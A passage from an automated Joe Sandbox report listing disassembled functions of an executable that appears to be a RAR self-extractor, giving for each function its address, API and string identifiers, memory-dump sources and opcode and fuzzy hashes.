                                                                                    • Opcode ID: 5a6a0a82813450954e4bce8bd94bd8ae44adaf32ce5c5423b070ca480ec48ac8
                                                                                    • Instruction ID: 1f57dab19f0a97241e100bcf4f8a78635e02c8a39fd65bbc70e2b1c85f20d94b
                                                                                    • Opcode Fuzzy Hash: 5a6a0a82813450954e4bce8bd94bd8ae44adaf32ce5c5423b070ca480ec48ac8
                                                                                    • Instruction Fuzzy Hash: 90115231A1EB424DFE51BF09E540179D291AF66792FC80434DB1E06358EE7CB5C7822C
                                                                                    Function 00007FF7B8F06BE4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: .rar$exe$rar$sfx
                                                                                    • API String ID: 3668304517-630704357
                                                                                    • Opcode ID: ed6c0415aae53d5d83c44bf31e967b4a1997e99d836b0e2f6e20eacd756ede83
                                                                                    • Instruction ID: c7d6c8630c45e9f5169f3778244be5053d56a9a1cd6cb17e956297127a05484c
                                                                                    • Opcode Fuzzy Hash: ed6c0415aae53d5d83c44bf31e967b4a1997e99d836b0e2f6e20eacd756ede83
                                                                                    • Instruction Fuzzy Hash: CCA1B332E1874648EA00BFA9D4402BCE361AF62B95F945231DF2D1769DDF7CE486C358
                                                                                    Function 00007FF7B8F24B60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 2889003569-2084237596
                                                                                    • Opcode ID: 0d0f266487a6bcdd9fb4d9508dd7b9d72bd76ff777f79cb43f1981ed916f6d56
                                                                                    • Instruction ID: 42d680102784fc8451fe3cc52c9f1347f04b341aee49a91750157ce91ec6e1bb
                                                                                    • Opcode Fuzzy Hash: 0d0f266487a6bcdd9fb4d9508dd7b9d72bd76ff777f79cb43f1981ed916f6d56
                                                                                    • Instruction Fuzzy Hash: 1D91C173A087918AE710EF68D4402ACFBA0FB66789F904229EF4C47759DF78D196C714
                                                                                    Function 00007FF7B8EFC564 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 2102711378-639343689
                                                                                    • Opcode ID: fbbc364b443e6bcbfe149e379a3e4d438152505baa5786c220f9f4379ee1b85d
                                                                                    • Instruction ID: b701ff1f4c72b9185781814feca63206d3804317477a822c69b944da7dce4330
                                                                                    • Opcode Fuzzy Hash: fbbc364b443e6bcbfe149e379a3e4d438152505baa5786c220f9f4379ee1b85d
                                                                                    • Instruction Fuzzy Hash: 1A51B262E1865289FB00EB69D8416BDE361AF66794FD01231DF1C5269EDF3CE582C328
                                                                                    Function 00007FF7B8F173BC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Rect
                                                                                    • String ID: RarHtmlClassName
                                                                                    • API String ID: 2396740005-1658105358
                                                                                    • Opcode ID: 6fa0cc47f7d0707d55d9f83579601ab4afff23b49e7df68c938394172d119a7c
                                                                                    • Instruction ID: 596ab5b137192e54df9a4c723bb70cecf81ab811a5cbe9cfaa6078b4c783f84d
                                                                                    • Opcode Fuzzy Hash: 6fa0cc47f7d0707d55d9f83579601ab4afff23b49e7df68c938394172d119a7c
                                                                                    • Instruction Fuzzy Hash: 76517431A087428EEB24AB29E44437AE761FFA6B81F840135DB4E47B5DDF3CE0468714
                                                                                    Function 00007FF7B8F1F6E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: 87760a2af9b407d00147cf7a3b839a2570e67654e84ed1419cd4c260ed5b7b7d
                                                                                    • Instruction ID: 61b0bcfcb655a572b7ef3bbfcf51ebf1303446120db7675b3edde5d0489fa5db
                                                                                    • Opcode Fuzzy Hash: 87760a2af9b407d00147cf7a3b839a2570e67654e84ed1419cd4c260ed5b7b7d
                                                                                    • Instruction Fuzzy Hash: 9B210F75908B4789FA50BB1DA4001B4E791FB66786F940635CA4C4276CDE7CEA478368
                                                                                    Function 00007FF7B8F2AED0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: c33d7e0f8341ea552e0517ec156bd2a34d33dd861b83bf5a45abcece7508b723
                                                                                    • Instruction ID: a91168a7b140b95bdc50a14232af4476283660fb984df0eea20cf74084ee7e94
                                                                                    • Opcode Fuzzy Hash: c33d7e0f8341ea552e0517ec156bd2a34d33dd861b83bf5a45abcece7508b723
                                                                                    • Instruction Fuzzy Hash: 41F0A471A28A428AEF44AF18F440279E360AF99791F841035EA4F4665CDF3CD48AC328
                                                                                    Function 00007FF7B8F334E0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: ba07143ee5fb4b821b9892e64ac383771b52719e743bfb21a5a3b36f45a2d478
                                                                                    • Instruction ID: 7d4f92e4979fc554e9a5f35b90ca4e03abb7fe060fc8c1080ceb0eeb8f3a2b64
                                                                                    • Opcode Fuzzy Hash: ba07143ee5fb4b821b9892e64ac383771b52719e743bfb21a5a3b36f45a2d478
                                                                                    • Instruction Fuzzy Hash: E2819E72A186528DF710EB6DE4406BDE7A0BB66B4AF804135DF0E13799DE3CE5438728
                                                                                    Function 00007FF7B8F32E54 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 3659116390-0
                                                                                    • Opcode ID: 03fd073ac050e41dcfb931d9061e8b68106110c1e2081ae22909b31ff0247e8a
                                                                                    • Instruction ID: 25d410c3088a241df0d737f472996e91b4809e07c6d0cd7bfa11d36878e94aec
                                                                                    • Opcode Fuzzy Hash: 03fd073ac050e41dcfb931d9061e8b68106110c1e2081ae22909b31ff0247e8a
                                                                                    • Instruction Fuzzy Hash: 3C51DC72A24A5189E710DB69E4403ACBBB4FB5AB99F848131DF4E47A9CCF38D146C724
                                                                                    Function 00007FF7B8F21850 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 262959230-0
                                                                                    • Opcode ID: ae27a30949b35a06bedf7a3807851c6d9ffd758e04f999068171b53f52544f6c
                                                                                    • Instruction ID: b71d3088c64b6636e8c61fdfda6d4f8ad7de0e31df2a99f2baafa920b0e6ebde
                                                                                    • Opcode Fuzzy Hash: ae27a30949b35a06bedf7a3807851c6d9ffd758e04f999068171b53f52544f6c
                                                                                    • Instruction Fuzzy Hash: 7441D631A086458DEB14AF69D4403B9F290BF557A6F944634FB6D467D9CE3CE0928328
                                                                                    Function 00007FF7B8F2E334 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: a8289328fcb01e400aa28d4254eaf24739f21b053bf311474ec92914a9cfe191
                                                                                    • Instruction ID: d88444799bb25081f1cc638fc0b8c65ae9899c50cb0b91a69b3f54384ea5a73d
                                                                                    • Opcode Fuzzy Hash: a8289328fcb01e400aa28d4254eaf24739f21b053bf311474ec92914a9cfe191
                                                                                    • Instruction Fuzzy Hash: B5416831B19A0189FA11AF5A9804571E393BF66BD1FA94535EF0D4B78EDE3CE4028328
                                                                                    Function 00007FF7B8F345F8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _set_statfp
                                                                                    • String ID:
                                                                                    • API String ID: 1156100317-0
                                                                                    • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                    • Instruction ID: cc4cc5b4ee2d47cd6a25ef58a5486991ae736cbd19d2b0aae17d8fadf4288017
                                                                                    • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                    • Instruction Fuzzy Hash: 1911E736E0CA031DF6543D6CE482375C145AFB73B2F894A30E76D066DEEE2C65834128
                                                                                    Function 00007FF7B8F250E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: __except_validate_context_recordabort
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 746414643-3733052814
                                                                                    • Opcode ID: 320da0a3ab9c4b8aaeea4206f6562d51adc4ea181d69879a579bb7510a498a50
                                                                                    • Instruction ID: 8b771ce1c0a96e83a40958e772a36b79900331477e57a0e0929f90d8cb9d368b
                                                                                    • Opcode Fuzzy Hash: 320da0a3ab9c4b8aaeea4206f6562d51adc4ea181d69879a579bb7510a498a50
                                                                                    • Instruction Fuzzy Hash: E481D5725086818ADBA0AF29904037DFBA1FB6AB96F449135EF8C4779DCB3CD452C718
                                                                                    Function 00007FF7B8F23DD0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 2395640692-1018135373
                                                                                    • Opcode ID: a35d48b5578e495f922cf91f3afc071af641c794b3d71e79bdab57817c2c414f
                                                                                    • Instruction ID: 08ccd0c19bb2f7b6c5a1eb85c33a9ae3693d5ed8d19e37fa568ae0fe2f23fa57
                                                                                    • Opcode Fuzzy Hash: a35d48b5578e495f922cf91f3afc071af641c794b3d71e79bdab57817c2c414f
                                                                                    • Instruction Fuzzy Hash: 4C51B172B196128EDB18EF19E404A38F3A1EB65B8AF904130FB494779CDF7DE8468714
                                                                                    Function 00007FF7B8F27678 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: $*
                                                                                    • API String ID: 3215553584-3982473090
                                                                                    • Opcode ID: 4cfe6dd33a15738d880b5919be94b7fdabf125c36f53c99954fa25938ace28d3
                                                                                    • Instruction ID: d2152759708803ef8f2abe424df23f7ba05e4b23070e2f935f758bcf42331009
                                                                                    • Opcode Fuzzy Hash: 4cfe6dd33a15738d880b5919be94b7fdabf125c36f53c99954fa25938ace28d3
                                                                                    • Instruction Fuzzy Hash: 1151667290D252CEEF646E3C8044378FAA0EB27B0AFB41135E74A4519DDB28E443CE69
                                                                                    Function 00007FF7B8F30678 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$StringType
                                                                                    • String ID: $%s
                                                                                    • API String ID: 3586891840-3791308623
                                                                                    • Opcode ID: 6b3a70f11b32926dc2d5655fcf7831c7212f2093134f053dad6b984199fe4c0b
                                                                                    • Instruction ID: 94d69dec591e947a32eb2baaba7e2b9f55f94d4760d165b8ce8c84b68ce2ae1b
                                                                                    • Opcode Fuzzy Hash: 6b3a70f11b32926dc2d5655fcf7831c7212f2093134f053dad6b984199fe4c0b
                                                                                    • Instruction Fuzzy Hash: 1A4187327147858EEB509F29D8006A9F291FBA57A9F880636DB1D077D8DF3CE4428714
                                                                                    Function 00007FF7B8F25590 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                    • String ID: csm
                                                                                    • API String ID: 2466640111-1018135373
                                                                                    • Opcode ID: c26bbf10109e0cf1fbdaac701120c7448e0257729b777b455f260bea3645797d
                                                                                    • Instruction ID: c9b9571290114819e1982ed692957553474d638cf2524ebac2442394a9685e8e
                                                                                    • Opcode Fuzzy Hash: c26bbf10109e0cf1fbdaac701120c7448e0257729b777b455f260bea3645797d
                                                                                    • Instruction Fuzzy Hash: C951C3726097418AE660EF19E14026EF7B4FB9ABA1F400134EB8C07B59DF3CE492CB54
                                                                                    Function 00007FF7B8F33280 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
